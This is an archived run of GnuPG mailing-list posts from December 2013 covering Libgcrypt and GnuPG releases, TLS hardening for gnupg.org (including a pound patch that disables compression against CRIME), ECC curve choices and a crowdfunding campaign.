On Sat, 14 Dec 2013 21:14, ekl...@gmail.com said: AFAIK, *is* an implementation of SSS. So, why would you write a new version? FWIW, a few years ago, Phil Sutter wrote a daemon for GnuPG which implements secret key splitting. I don't have the URL handy, but it should be easy to find. Salam-Shalom, Werner -- Die Gedanken sind frei. Ausnahmen regelt ein Bundesgesetz. ___ Gnupg-users mailing list Gnupg-users@gnupg.org http://lists.gnupg.org/mailman/listinfo/gnupg-users
[Announce] Libgcrypt 1.6.0 released
Hello! The GNU project is pleased to announce the availability of Libgcrypt version 1.6.0. This is the new stable version of Libgcrypt with the API being mostly compatible to previous versions. Due to the removal of certain long deprecated functions this version introduces an ABI change. Libgcrypt is a general purpose library of cryptographic building blocks. It is originally based on code used by GnuPG. It does not provide any implementation of OpenPGP or other protocols. Thorough understanding of applied cryptography is required to use Libgcrypt. The main features of this version are performance improvements [3], better support for elliptic curves, new algorithms and modes, as well as API and internal cleanups. Better performance of public key algorithms, in particular for Curve25519, is planned for forthcoming releases. Note that the 1.5 series will enter end of life state on 2016-12-31. Noteworthy changes between version 1.5.0 and 1.6.0: === * Removed the long deprecated gcry_ac interface. Thus Libgcrypt is not anymore ABI compatible to previous versions if they used the ac interface. * Removed the module register subsystem. * The deprecated message digest debug macros have been removed. Use gcry_md_debug instead. * Removed deprecated control codes. * Improved performance of most cipher algorithms as well as for the SHA family of hash functions. * Added support for the IDEA cipher algorithm. * Added support for the Salsa20 and reduced Salsa20/12 stream ciphers. * Added limited support for the GOST 28147-89 cipher algorithm. * Added support for the GOST R 34.11-94 and R 34.11-2012 (Stribog) hash algorithms. * Added a random number generator to directly use the system's RNG. Also added an interface to prefer the use of a specified RNG. * Added support for the SCRYPT algorithm. * Mitigated the Yarom/Falkner flush+reload side-channel attack on RSA secret keys. See http://eprint.iacr.org/2013/448 [CVE-2013-4242]. * Added support for Deterministic DSA as per RFC-6969. * Added support for curve Ed25519. * Added a scatter gather hash convenience function. * Added several MPI amd SEXP helper functions. * Added support for negative numbers to gcry_mpi_print, gcry_mpi_aprint and gcry_mpi_scan. * The algorithm ids GCRY_PK_ECDSA and GCRY_PK_ECDH are now deprecated. Use GCRY_PK_ECC if you need an algorithm id. * Changed gcry_pk_genkey for ecc to only include the curve name and not the parameters. The flag param may be used to revert this. * Added a feature to globally disable selected hardware features. * Added debug helper functions. For Interface changes relative to the 1.5.0 release see below [4]. Download Source code is hosted at the GnuPG FTP server and its mirrors as listed at http://www.gnupg.org/download/mirrors.html . On the primary server the source file and its digital signatures is: ftp://ftp.gnupg.org/gcrypt/libgcrypt/libgcrypt-1.6.0.tar.bz2 (2441k) ftp://ftp.gnupg.org/gcrypt/libgcrypt/libgcrypt-1.6.0.tar.bz2.sig This file is bzip2 compressed. A gzip compressed version is also available: ftp://ftp.gnupg.org/gcrypt/libgcrypt/libgcrypt-1.6.0.tar.gz (2866k) ftp://ftp.gnupg.org/gcrypt/libgcrypt/libgcrypt-1.6.0.tar.gz.sig Due to the amount of changes we don't provide a patch file against 1.5.x. The SHA-1 checksums are: 43283c0b41c41e3d3bc13c2d8f937dfe2aaa1a77 libgcrypt-1.6.0.tar.bz2 03551121fe5b706532158667699f63b6e2606755 libgcrypt-1.6.0.tar.gz Copying === Libgcrypt is distributed under the terms of the GNU Lesser General Public License (LGPLv2.1+). The helper programs as well as the documentation are distributed under the terms of the GNU General Public License (GPLv2+). The file LICENSES has notices about contributions that require these additional notices are distributed. Support === For help on developing with Libgcrypt you should read the included manual and optional ask on the gcrypt-devel mailing list [1]. A listing with commercial support offers for Libgcrypt and related software is available at the GnuPG web site [2]. The driving force behind the development of Libgcrypt is my company g10 Code. Maintenance and improvement of Libgcrypt and related software takes up most of our resources. To allow us to continue our work on free software, we ask to either purchase a support contract, engage us for custom enhancements, or to donate money: http://g10code.com/gnupg-donation.html Thanks == Many thanks to all who contributed to Libgcrypt development, be it bug fixes, code, documentation, testing or helping users. Special thanks to Jussi Kivilinna who did most of the performance improvement work. Happy hacking, Werner [1] http://www.gnupg.org/documentation/mailing-lists.html [2]
Re: please give us safer defaults for gnupg
On Mon, 16 Dec 2013 18:37, adrela...@riseup.net said: [This was originally planed as an open letter, but I thought it might be better to hear your arguments beforehand.] May I suggest to read the archives of just a few weeks to collect the reasons why suggestions of using SHA-512 are missing the point. Some folks here must have bleeding fingertips from repeating the arguments over and over. Having said this, I like to appreciate that you have such a trust in us GnuPG hackers in that our coding practice and development environment is bug free at a level that only cracking algorithms is the danger to your data. I think Adi Shamir was it who said: Nobody breaks crypto algorithms; they work around the crypto. Shalom-Salam, Werner -- Die Gedanken sind frei. Ausnahmen regelt ein Bundesgesetz. ___ Gnupg-users mailing list Gnupg-users@gnupg.org http://lists.gnupg.org/mailman/listinfo/gnupg-users
Re: Libgcrypt 1.6.0 released and gunpg 2.x
On Tue, 17 Dec 2013 05:23, shm...@riseup.net said: use the new 1.6.0, do i need to uninstall gnupg libcrypt and then compile both again together, and re-install ? 1.6.0 has a new SO number so there are no runtime conflicts. However, to avoid building problems, better de-install or overwrite the 1.5.3 development files (static library (if build), header files, and libgcrypt-config). If you installed 1.5.3 yourself, simply installing 1.6.0 should do everything you need. I am not 100% sure that building gnupg 2.0 will work without problems - I only tested the latest 2.0 GIT version. gnupg 2.x would not work with the new libgcrypt if i just install it alone, would it ? (im sure i have to do it all again...) No you need to build gnupg again. Libgcrypt has a different ABI and thus a different SO number (20 on common Linux systems). Salam-Shalom, Werner -- Die Gedanken sind frei. Ausnahmen regelt ein Bundesgesetz. ___ Gnupg-users mailing list Gnupg-users@gnupg.org http://lists.gnupg.org/mailman/listinfo/gnupg-users
Re: please give us safer defaults for gnupg
On Tue, 17 Dec 2013 00:11, adrela...@riseup.net said: compatibility, you can never reduce complexity. Less complexity means more simplicity, thus perhaps more usability. In my experience, projects [ You may want to start getting rid of software which is run on your computer without you being in control of it (noscript seems to be the Anti-virus software counterpart for the Web) ] Please tell me, what kind of argument would you accept? I guess you'd like to see loads of happy gpg users, gpg for the masses, etc. Would numbers convince you? I mean, What if alternative projects such as The next step will be the move to ECC which increases the security while at the same time reducing the computation load and allowing for really short keys (e.g. 32 bytes) Bitmessage etc. managed to get far more users while gpg passes into oblivion [while they objectively provide more/less security]? There are many systems with more users than gpg. Actually most systems have more users. Think of Skype, Bittorrent, or even Jabber. I believe GnuPG is still a useful tool, much like zip or tar. As with many infrastructure systems you will notices it only if it stops working. No more off-line credit card processing, hardware supply chains breaks, no way to detect tampered software distributions etc, no way to send account data. It is easy for centralized or semi-centralized systems to get usage statistics, for PGP (and to a less degree for S/MIME) it is much harder to get the figures. There are may keyservers running inside of many companies. Shalom-Salam, Werner ps. As a minor data point that OpenPGP is getting more attention might be the fact that the German Home Office has come around to prominent publish a PGP key at their contact page (576D4411C9AD3034). Funnily wrapped into a ZIP file, though. No hints for S/MIME or other encryption methods. -- Die Gedanken sind frei. Ausnahmen regelt ein Bundesgesetz. ___ Gnupg-users mailing list Gnupg-users@gnupg.org http://lists.gnupg.org/mailman/listinfo/gnupg-users
Re: X.509 certificates for https://gnupg.org
On Tue, 17 Dec 2013 04:05, mi...@micahflee.com said: torproject.org is pretty much an ideal example. They serve binaries of Tor Browser Bundle from https://www.torproject.org/ and have been attacked by governments all over the world, so they've put a lot of time and energy in doing things right. I'd like to see GPG have just as good gnupg.org is a bit different in that in general we only provide source code and not ready to use binaries. Thus this is not a mainstream download site. Gpg4win.org, at the other hand, provides Windows installers and we [1] even acquired a code signing certificate so that users don't complain about the Windows message about downloaded from the Internet; unknown issuer. It is well known that a lot of rogue software shows up as valid and signed software and that this code signing does not provide any security. However, users want that. Far less people complained about Intevation's own CA for https access to gpg4win.org. I am unsure what to do about CA certificates - I don't trust the global PKIX at all. It lures users into false security. Thus, I believe CAcert is just as fine as any other - it can't be better because all root certificates are implicitly cross-signed (the browser treats them all the same). (And for that matter, why do I have two cookies in my browser that gnupg.org set? _pk_id.1.9e41 and _pk_ses.1.9e41 -- the id one is a unique id, which means it can be used to track my movements through that You must be running with JavaScript enabled ;-). This seems to be from Piwik, which I recently installed to gather web statistics. I am not really happy with that but my campaign manager said that it is really needed and that organization like the EFF also run Piwik. Our privacy policy says ** Analytics This website uses Piwik, a Free Software web analytics system, to monitor traffic on our Web sites. Piwik records the general geographical vicinity of visitors as well as their browser and operating system, and records their navigation within the sites. This helps us gauge the impact of our materials and improve our work. Our Piwik system preserves privacy by anonymizing visitors’ IP addresses. This means that we will not store any personally identifiable information about you, even though your visit produces a record that our site was visited by someone. Piwik also respects the “[[http://donottrack.us/][Do Not Track]]” preference offered by some browsers, so if you have this option set, Piwik will ignore your visit entirely. Details of how Piwik protects privacy are on [[http://piwik.org/privacy/][their website]]. I guess we will eventually switch to log file statistics which basically returns the same information. And also tracks those who disabled JS - whether this is good or worse, I don't know. Salam-Shalom, Werner [1] g10 Code and Intevation, the latter being a company I often work with and co-run by yet another founder of the FSFE. -- Die Gedanken sind frei. Ausnahmen regelt ein Bundesgesetz. ___ Gnupg-users mailing list Gnupg-users@gnupg.org http://lists.gnupg.org/mailman/listinfo/gnupg-users
Re: Another step towards crowdfunding
On Mon, 16 Dec 2013 20:32, mi...@micahflee.com said: Ahh, it's good to know that gnupg.org is available for https. But I would guess a very small percentage of your visitors use it, or even know that it's available. Well, bowsers could first try to use https. Would it help them to provide a SRV record for this? If you want to fix this, you could make all incoming http traffic respond with a 301 redirect to https. I am not sure whether this helps. If we eventually offer http download we could use https: fro that instead. There is also a plan for provided a hidden tor service. this (and because it's good practice and doesn't hurt) you could also set the HSTS header, which prevents browser from accidentally (or being tricked into) loading the website over http: Should be considered, I need to hack up Boa anyway. Also, looks like the CA is CAcert--an awesome CA, but not trusted by browsers by default. I'd suggest getting a cert from StartSSL [https://startssl.com/], since they're they only CA that gives certs for free. And a wildcard cert (for *.gnupg.org) ends up costing like $60 USD. I hesitate to pay the highwaymen. Also, it would be great if the use of https could be done better. The Qualys SSL report gives https://gnupg.org/ an F (because of the CAcert issue), but even if you used a browser-trusted CA it still wouldn't be the best: https://www.ssllabs.com/ssltest/analyze.html?d=gnupg.org Yes, there is a the problem with the CAcert intermediate certificate - it is on my todo list to update this. I notice you're using Boa Webserver, and their docs don't seem to show how to do things like set custom http headers or mess with the Adding headers is easy, as said. Boa does not do https. gnupg.org uses the pound proxy to implement https and redirection. I changed the cipher suite for gnupg.org to a quite restricted one. More to come. Shalom-Salam, Werner -- Die Gedanken sind frei. Ausnahmen regelt ein Bundesgesetz. ___ Gnupg-users mailing list Gnupg-users@gnupg.org http://lists.gnupg.org/mailman/listinfo/gnupg-users
Re: X.509 certificates for https://gnupg.org
On Mon, 16 Dec 2013 21:35, d...@fifthhorseman.net said: Werner, if i can help with configuring or maintaining the web server for gnupg.org to address some of these issues, please let me know. Yes, I have problems to figure out a woking cipher list which also allows for IE. What DHE cipher suite may I use with IE given that I have only an RSA certificate. Or should I simply give up on PFS for IE users? The active ciphers are right now: ECDHE-RSA-AES128-SHASSLv3 Kx=ECDH Au=RSA Enc=AES(128) Mac=SHA1 DHE-RSA-AES128-SHA SSLv3 Kx=DH Au=RSA Enc=AES(128) Mac=SHA1 DHE-RSA-AES256-SHA SSLv3 Kx=DH Au=RSA Enc=AES(256) Mac=SHA1 Shalom-Salam, Werner p.s. Attached is I my SSLNoCompression patch for Debian's pound in case someone is interested. -- Die Gedanken sind frei. Ausnahmen regelt ein Bundesgesetz. --- a/config.c 2013-12-17 13:15:09.0 +0100 +++ b/config.c 2013-12-17 13:20:16.0 +0100 @@ -76,7 +76,7 @@ static regex_t Err414, Err500, Err501, Err503, MaxRequest, HeadRemove, RewriteLocation, RewriteDestination; static regex_t Service, ServiceName, URL, HeadRequire, HeadDeny, BackEnd, Emergency, Priority, HAport, HAportAddr; static regex_t Redirect, RedirectN, TimeOut, Session, Type, TTL, ID, DynScale; -static regex_t ClientCert, AddHeader, SSLAllowClientRenegotiation, SSLHonorCipherOrder, Ciphers, CAlist, VerifyList, CRLlist, NoHTTPS11; +static regex_t ClientCert, AddHeader, SSLAllowClientRenegotiation, SSLHonorCipherOrder, SSLNoCompression, Ciphers, CAlist, VerifyList, CRLlist, NoHTTPS11; static regex_t Grace, Include, ConnTO, IgnoreCase, HTTPS, HTTPSCert, Disabled, Threads, CNName; static regmatch_t matches[5]; @@ -1057,6 +1057,14 @@ ssl_op_disable |= SSL_OP_CIPHER_SERVER_PREFERENCE; ssl_op_enable = ~SSL_OP_CIPHER_SERVER_PREFERENCE; } +} else if(!regexec(SSLNoCompression, lin, 4, matches, 0)) { +if (atoi(lin + matches[1].rm_so)) { +ssl_op_enable |= SSL_OP_NO_COMPRESSION; +ssl_op_disable = ~SSL_OP_NO_COMPRESSION; +} else { +ssl_op_disable |= SSL_OP_NO_COMPRESSION; +ssl_op_enable = ~SSL_OP_NO_COMPRESSION; +} } else if(!regexec(Ciphers, lin, 4, matches, 0)) { has_other = 1; if(res-ctx == NULL) @@ -1338,6 +1346,8 @@ || regcomp(AddHeader, ^[ \t]*AddHeader[ \t]+\(.+)\[ \t]*$, REG_ICASE | REG_NEWLINE | REG_EXTENDED) || regcomp(SSLAllowClientRenegotiation, ^[ \t]*SSLAllowClientRenegotiation[ \t]+([012])[ \t]*$, REG_ICASE | REG_NEWLINE | REG_EXTENDED) || regcomp(SSLHonorCipherOrder, ^[ \t]*SSLHonorCipherOrder[ \t]+([01])[ \t]*$, REG_ICASE | REG_NEWLINE | REG_EXTENDED) +|| regcomp(SSLNoCompression, ^[ \t]*SSLNoCompression[ \t]+([01])[ \t]*$, + REG_ICASE | REG_NEWLINE | REG_EXTENDED) || regcomp(Ciphers, ^[ \t]*Ciphers[ \t]+\(.+)\[ \t]*$, REG_ICASE | REG_NEWLINE | REG_EXTENDED) || regcomp(CAlist, ^[ \t]*CAlist[ \t]+\(.+)\[ \t]*$, REG_ICASE | REG_NEWLINE | REG_EXTENDED) || regcomp(VerifyList, ^[ \t]*VerifyList[ \t]+\(.+)\[ \t]*$, REG_ICASE | REG_NEWLINE | REG_EXTENDED) @@ -1498,6 +1508,7 @@ regfree(AddHeader); regfree(SSLAllowClientRenegotiation); regfree(SSLHonorCipherOrder); +regfree(SSLNoCompression); regfree(Ciphers); regfree(CAlist); regfree(VerifyList); --- a/pound.8 2013-12-17 13:19:36.0 +0100 +++ b/pound.8 2013-12-17 13:19:40.0 +0100 @@ -514,6 +514,14 @@ supported. If the value is 2, insecure renegotiation is supported, with unpatched clients. /fBThis can lead to a DoS and a Man in the Middle attack!/fR Default value is 0. .TP +\fBSSLNoCompression\fR 0|1 +If this value is 1, the server will disable DEFLATE compression even if both server +and client supports it. In case compression is enabled an attacker with access to +encrypted network traffic can conduct a CRIME attack by making client issue requests +with specific character sequences and observing whether they got compressed or not, +indicating their presence in part of the request that is not under his control +(e.g. cookie headers). Default value is 0. +.TP \fBCAlist\fR CAcert_file Set the list of trusted CA's for this server. The CAcert_file is a file containing a sequence of CA certificates (PEM format). The names of the defined CA certificates ___ Gnupg-users mailing list Gnupg-users@gnupg.org http://lists.gnupg.org/mailman/listinfo/gnupg-users
Re: Another step towards crowdfunding
On Tue, 17 Dec 2013 14:53, samt...@gnupg.org said: I could do that if others are happy with the idea. Any objections? Werner? No. Salam-Shalom, Werner -- Die Gedanken sind frei. Ausnahmen regelt ein Bundesgesetz. ___ Gnupg-users mailing list Gnupg-users@gnupg.org http://lists.gnupg.org/mailman/listinfo/gnupg-users
Re: encryption algorithm
On Tue, 17 Dec 2013 16:07, md...@nycap.rr.com said: Hi! What encryption algorithm do we use in OpenPGP The defaults for the public key algorithm is RSA with a 2048 bits. For the symmentric session key the default algorithms are AES256, AES192, AES256, CAST5-128, 3DES where gpg picks the best macthing one depending on the capabilities of the recipients key. If all recipeins have new keys they will all use AES256. (new is measured in years). ___ Gnupg-users mailing list Gnupg-users@gnupg.org http://lists.gnupg.org/mailman/listinfo/gnupg-users -- Die Gedanken sind frei. Ausnahmen regelt ein Bundesgesetz. ___ Gnupg-users mailing list Gnupg-users@gnupg.org http://lists.gnupg.org/mailman/listinfo/gnupg-users
Re: X.509 certificates for https://gnupg.org
On Tue, 17 Dec 2013 18:52, d...@fifthhorseman.net said: I think it depends on what flavor of IE you're using (and what version of the underlying OS you're using as well). The version of schannel in Seems so. I updated my Windows 7 box to IE11 with no channel. Maybe I need to update more. Anywa IE11 seems to pretty new. If you want to be able to support these systems, you may need to add a low-priority Lowest Common Denominator ciphersuite to match them. Sadly, that seems likely to be TLS_RSA_WITH_3DES_EDE_CBC_SHA, unless Okay, IE users are anyway on Windows. So why provide PFS for an OS that may have a direct path to Maryland anyway. supported by XP's native TLS stack). I've never even tried to get a DSA certificate for a web server from any member of the CA cartel. Have you? No. I recall that I tried to get a certificate for mail use to test my DSA code in gpgsm but I was not able to get one. The customer then dropped the DSA support from the requirements list. For web servers this should be possible - why else do they add those algorithms. After all that could be a selling point for an E+V certificate - if they could only find a new color. lowest-common-denominator ciphersuite unless it's the only one they support, you should probably set SSLHonorCipherOrder 1 in your pound Did exactly that for the g10code site buy now. I'll fix the intermediate CAcert certifciate problem tomorrow. Salam-Shalom, Werner -- Die Gedanken sind frei. Ausnahmen regelt ein Bundesgesetz. ___ Gnupg-users mailing list Gnupg-users@gnupg.org http://lists.gnupg.org/mailman/listinfo/gnupg-users
Re: gpgsm and encrypt-to
On Tue, 17 Dec 2013 18:32, clou...@informationelle-selbstbestimmung-im-internet.de said: gpgsm has the option encrypt-to, which is not mentioned in the man page. Is that option stable or might it disappear in the future? It is stable - just missing in the man page. Shalom-Salam, Werner -- Die Gedanken sind frei. Ausnahmen regelt ein Bundesgesetz. ___ Gnupg-users mailing list Gnupg-users@gnupg.org http://lists.gnupg.org/mailman/listinfo/gnupg-users
Re: gpgsm and trusted keys
On Tue, 17 Dec 2013 18:57, clou...@informationelle-selbstbestimmung-im-internet.de said: Is there a way to mark intermediate CAs as trusted so that all certificates issued by them become usable? Sorry, there is currently no such way. The code always walks up to the root. Shalom-Salam, Werner -- Die Gedanken sind frei. Ausnahmen regelt ein Bundesgesetz. ___ Gnupg-users mailing list Gnupg-users@gnupg.org http://lists.gnupg.org/mailman/listinfo/gnupg-users
Re: ECC curves used in gnupg?
On Tue, 17 Dec 2013 20:01, anth...@cajuntechie.org said: I know that gnupg is experimenting with ECC and I'm wondering which curves the team has decided to use. I know there are some curves that are now suspected of being tainted by the NSA through NIST. Has the gnupg team ruled using those curves out? We will support the curves specified in RFC-6637. These are the NIST curves P-256, P-384, and P-521. I recently added support for Brainpool P256r1, P384r1, and P512r1 to make some some European governments happy. I the wake of recent events and due to the fear of many people that the NIST curves might have some secret properties, I added support for Bernstein et al's Ed25519 signature scheme. The problem here is that it is not really covered by RFC-6637 because it does not use the ECDSA signature scheme but a Schnorr like scheme named EdDSA. Thus for a proper implementation we need to assign a new algorithm number to it which in turn means to write another RFC. I recently met with Phil Zimmermann and we talked about the OpenPGP future. It is pretty clear that we need to replace the current algorithms with elliptic curves to get a better security margin for the future. Alhough there are no technical reasons not to use existing standard curves, we better take the users unhappiness with NIS curves in account and move on to curves like Ed25519 which are easier to use and are an outcome of public research. Bernstein and Lange are currently working on a 384 bit curve and it is very likely that this one will also be added to GnuPG. Salam-Shalom, Werner -- Die Gedanken sind frei. Ausnahmen regelt ein Bundesgesetz. ___ Gnupg-users mailing list Gnupg-users@gnupg.org http://lists.gnupg.org/mailman/listinfo/gnupg-users
Re: encryption algorithm
On Wed, 18 Dec 2013 02:27, r...@sixdemonbag.org said: because you just shifted to arguing that since GnuPG defaults to AES-256, we need to use RSA-15000 by default otherwise the asymmetric FWIW: The rationale why we use the order AES256,192,128 is for compatibility reasons with PGP. If gpg would define AES128 first, we would get the somewhat confusing situation: gpg -r pgpkey -r gpgkey ---gives-- AES256 gpg -r gpgkey -r pgpkey ---gives-- AES PGP prefers AES256 for the simple reason that the marketing deptartment told the engineering that 256 sounds stronger than 128 (according to one of their lead developers). Shalom-Salam, Werner -- Die Gedanken sind frei. Ausnahmen regelt ein Bundesgesetz. ___ Gnupg-users mailing list Gnupg-users@gnupg.org http://lists.gnupg.org/mailman/listinfo/gnupg-users
[Announce] [security fix] GnuPG 1.4.16 released
to check that the version of GnuPG which you are going to install is an original and unmodified one, you can do it in one of the following ways: * If you already have a trusted version of GnuPG installed, you can simply check the supplied signature. For example to check the signature of the file gnupg-1.4.16.tar.bz2 you would use this command: gpg --verify gnupg-1.4.16.tar.bz2.sig This checks whether the signature file matches the source file. You should see a message indicating that the signature is good and made by that signing key. Make sure that you have the right key, either by checking the fingerprint of that key with other sources or by checking that the key has been signed by a trustworthy other key. Note, that you can retrieve the signing key using the command finger wk ,at' g10code.com | gpg --import or using a keyserver like gpg --recv-key 4F25E3B6 The distribution key 4F25E3B6 is signed by the well known key 1E42B367. If you get an key expired message, you should retrieve a fresh copy as the expiration date might have been prolonged. NEVER USE A GNUPG VERSION YOU JUST DOWNLOADED TO CHECK THE INTEGRITY OF THE SOURCE - USE AN EXISTING GNUPG INSTALLATION! * If you are not able to use an old version of GnuPG, you have to verify the SHA-1 checksum. Assuming you downloaded the file gnupg-1.4.16.tar.bz2, you would run the sha1sum command like this: sha1sum gnupg-1.4.16.tar.bz2 and check that the output matches the first line from the following list: 0bf5e475f3eb6f33d5474d017fe5bf66070e43f4 gnupg-1.4.16.tar.bz2 ea40324a5b2e3a16ffb63ea0ccc950a3faf5b11c gnupg-1.4.16.tar.gz ead70b47218ba76da51c16b652bee2a712faf2f6 gnupg-1.4.15-1.4.16.diff.bz2 82079c7c183467b4dd3795ca197983cd2494cec4 gnupg-w32cli-1.4.16.exe Internationalization GnuPG comes with support for 29 languages. The Chinese (Simple and Traditional), Czech, Danish, Dutch, French, German, Norwegian, Polish, Romanian, Russian, Spanish, Swedish, Ukrainian, and Turkish translations are close to be complete. Support === A listing with commercial support offers for GnuPG is available at: http://www.gnupg.org/service.html The driving force behind the development of GnuPG is the company of its principal author, Werner Koch. Maintenance and improvement of GnuPG and related software take up a most of their resources. To allow them continue their work they ask to either purchase a support contract, engage them for custom enhancements, or to donate money: http://g10code.com/gnupg-donation.html Thanks == We have to thank all the people who helped with this release, be it testing, coding, translating, suggesting, auditing, donating money, spreading the word, or answering questions on the mailing lists. Many thanks to Eran Tromer for providing early drafts of the paper and testing the fixes. Happy Hacking, The GnuPG Team -- Die Gedanken sind frei. Ausnahmen regelt ein Bundesgesetz. pgprz4HJfZ8Ee.pgp Description: PGP signature ___ Gnupg-announce mailing list gnupg-annou...@gnupg.org http://lists.gnupg.org/mailman/listinfo/gnupg-announce___ Gnupg-users mailing list Gnupg-users@gnupg.org http://lists.gnupg.org/mailman/listinfo/gnupg-users
Re: Another step towards crowdfunding
On Tue, 17 Dec 2013 20:40, c...@rheloud.net said: How about an RSS-Feed. We used to have one for the News. It is currently disabled but will come back with the new website. Shalom-Salam, Werner -- Die Gedanken sind frei. Ausnahmen regelt ein Bundesgesetz. ___ Gnupg-users mailing list Gnupg-users@gnupg.org http://lists.gnupg.org/mailman/listinfo/gnupg-users
Re: FAQ? Re: please give us safer defaults for gnupg
On Wed, 18 Dec 2013 16:09, bernh...@intevation.de said: What about placing this as an FAQ in the wiki.gnupg.org? We have a FAQ which answers a lot of questions around key sizes in “Advanced Topics” section. If something is missing it can easily be added. Salam-Shalom, Werner -- Die Gedanken sind frei. Ausnahmen regelt ein Bundesgesetz. ___ Gnupg-users mailing list Gnupg-users@gnupg.org http://lists.gnupg.org/mailman/listinfo/gnupg-users
Re: gpg-rsa-key decryption with a mobile
On Wed, 18 Dec 2013 18:31, sys...@ioioioio.eu said: Here, we describe a new acoustic cryptanalysis key extraction attack, applicable to GnuPG's current implementation of RSA. The attack can Well that is what I posted a few hours ago to this list ;-). Salam-Shalom, Werner -- Die Gedanken sind frei. Ausnahmen regelt ein Bundesgesetz. ___ Gnupg-users mailing list Gnupg-users@gnupg.org http://lists.gnupg.org/mailman/listinfo/gnupg-users
[Announce] GnuPG launches crowdfunding campaign
GnuPG encryption project launches crowdfunding campaign Today GNU Privacy Guard (GnuPG) has launched its first crowdfunding campaign [1] with the aim of building a new website and long term infrastructure. The 24.000 EUR target will fund: - Fresh web interfaces for gnupg.org including mobile - Completion and release of GnuPG 2.1 - Anonymous Tor network access to the website - A new user friendly download page suitable for all devices - A new server for web services - New pages convening external guides, videos, and handbooks - Facilities for processing recurring donations for long term project support Project founder and Lead Developer Werner Koch said “GnuPG has seen a huge upsurge in popularity following recent state spying revelations. After 16 years of continuous development, we are now asking for community support to capitalise on consumer demand for privacy, and make GnuPG easy to access for mainstream audiences”. GnuPG is one of the few tools remaining above suspicion in the wake of leaked NSA documents. Edward Snowden and his contacts including Bruce Schneier switched to GnuPG when they began handling the secret documents earlier this year [2]. The Wall Street Journal, The Committee to Protect Journalists, and ProPublica [3] have all embraced GnuPG for protection of staff and sources. Phil Zimmermann, original inventor of Pretty Good Privacy (PGP), has also moved to GnuPG in wake of the news. “GnuPG is a key part of modern privacy infrastructure” said Sam Tuke, Campaign Manager, GnuPG. “Millions of users rely on GnuPG to work securely on servers, laptops and smartphones, but 2013 donations totaling 3.000 EUR to date have not even covered fixed costs. Supporting new algorithms like elliptical curve and fixing newfound exploits fast takes a lot of work which is done voluntarily. Now is the time for people to contribute to making GnuPG slick and more sustainable in future”. Jacob Appelbaum, Tor Project developer, added “GnuPG is important - it allows us the assurances we need to do our work. Community funding is a critical part of a confident outlook for GnuPG in future.” For further information, please contact Sam Tuke. Email: samtuke [at] gnupg.org Phone: +49 176 81923811 [1] http://goteo.org/project/gnupg-new-website-and-infrastructure [2] http://www.theguardian.com/world/2013/sep/05/nsa-how-to-remain-secure-surveillance [3] http://www.cjr.org/behind_the_news/hacks_hackers_security_for_jou.php == About GNU Privacy Guard == GnuPG is a leading cryptography app that protects emails and data from interception. It is developed by a community of Free Software engineers led by Werner Koch. GnuPG is used and recommended by the world’s top security experts, including Bruce Schneier and Phil Zimmermann. It offers best in class privacy free of charge and restriction. Hundreds of companies have integrated GnuPG into their products to perform mission critical security, including Red Hat, Deutsche Bahn, and many others. http://gnupg.org -- Die Gedanken sind frei. Ausnahmen regelt ein Bundesgesetz. ___ Gnupg-announce mailing list gnupg-annou...@gnupg.org http://lists.gnupg.org/mailman/listinfo/gnupg-announce ___ Gnupg-users mailing list Gnupg-users@gnupg.org http://lists.gnupg.org/mailman/listinfo/gnupg-users
Re: [Announce] GnuPG launches crowdfunding campaign
On Thu, 19 Dec 2013 12:17, christophe.bro...@cnamts.fr said: It is not very clear on the website campaign that the completion of the GnuPG 2.1 is in the scope of the campaign. GnuPG 2.1 will be ready with the new website or even earlier. However, 2.1 won't immediately replace 2.0 (or 1.4) on all platforms I expect that this takes some time. Salam-Shalom, Werner -- Die Gedanken sind frei. Ausnahmen regelt ein Bundesgesetz. ___ Gnupg-users mailing list Gnupg-users@gnupg.org http://lists.gnupg.org/mailman/listinfo/gnupg-users
Re: [Announce] GnuPG launches crowdfunding campaign
On Thu, 19 Dec 2013 13:45, ricu...@gmail.com said: As this is about a crypto project, wouldn't it be adequate to accept payments in crypto currencies? Agreed. However, we don't have the resources to do that. The new infrastructure topic covers payment options and likely we will accept Bitcoins then. The funding platform seems not to support it yet. Shalom-Salam, Werner -- Die Gedanken sind frei. Ausnahmen regelt ein Bundesgesetz. ___ Gnupg-users mailing list Gnupg-users@gnupg.org http://lists.gnupg.org/mailman/listinfo/gnupg-users
Re: [Announce] GnuPG launches crowdfunding campaign
On Thu, 19 Dec 2013 14:31, go...@fsfe.org said: point. Choosing goteo was IMHO a good idea because their system is Free Software and I don't know if they even support BTC et al. Indeed. After all crowd funding is about community building and thus I consider it the Right Thing to help each other. Goteo is mainly used in Spain but it is worth to get better known. Agreed there a a couple of problems, like missing translations but Goteo has evolved much enough since we first looked at in September, to assume that the remaining problems will soon be fixed. The privacy policy and the terms or services are not translated to English - this is an unfortunate oversight of us. Shalom-Salam, Werner -- Die Gedanken sind frei. Ausnahmen regelt ein Bundesgesetz. ___ Gnupg-users mailing list Gnupg-users@gnupg.org http://lists.gnupg.org/mailman/listinfo/gnupg-users
Re: [Announce] GnuPG launches crowdfunding campaign
On Thu, 19 Dec 2013 17:35, j...@berklix.com said: You might want to suggest to goteo.org it might be quicker for them to use a translater engine then hand correct, rather than translate type all ? A reason might be that they have concerns publishing a translation if not done by lawyer. However, the half-translated TOS would contradict this assumption. I only know of 2 free translaters so far, listed on my http://www.berklix.eu/~jhs/trans/ I bet we will eventually hear about the NSA project to track translation engines. Shalom-Salam, Werner -- Die Gedanken sind frei. Ausnahmen regelt ein Bundesgesetz. ___ Gnupg-users mailing list Gnupg-users@gnupg.org http://lists.gnupg.org/mailman/listinfo/gnupg-users
Re: gpg-rsa-key decryption with a mobile
On Thu, 19 Dec 2013 17:54, o...@mat.ucm.es said: Since you are mentioned in this webpage, do you know by any chance whether gpgsm is vulnerable in a similar way? gpgsm uses Libgcrypt and Libgcrypt employs RSA blinding for a long time now. Thus it is not vulnerable. The reason Libgcrypt has RSA blinding is that it is used by online protocols like TLS were it is easy to mount certain timing attacks in the LAN. With GnuPG these calls of network based attacks are not possible and thus we did not used blinding in GnuPG-1. Salam-Shalom, Werner -- Die Gedanken sind frei. Ausnahmen regelt ein Bundesgesetz. ___ Gnupg-users mailing list Gnupg-users@gnupg.org http://lists.gnupg.org/mailman/listinfo/gnupg-users
[Announce] 0x10 years of protecting privacy
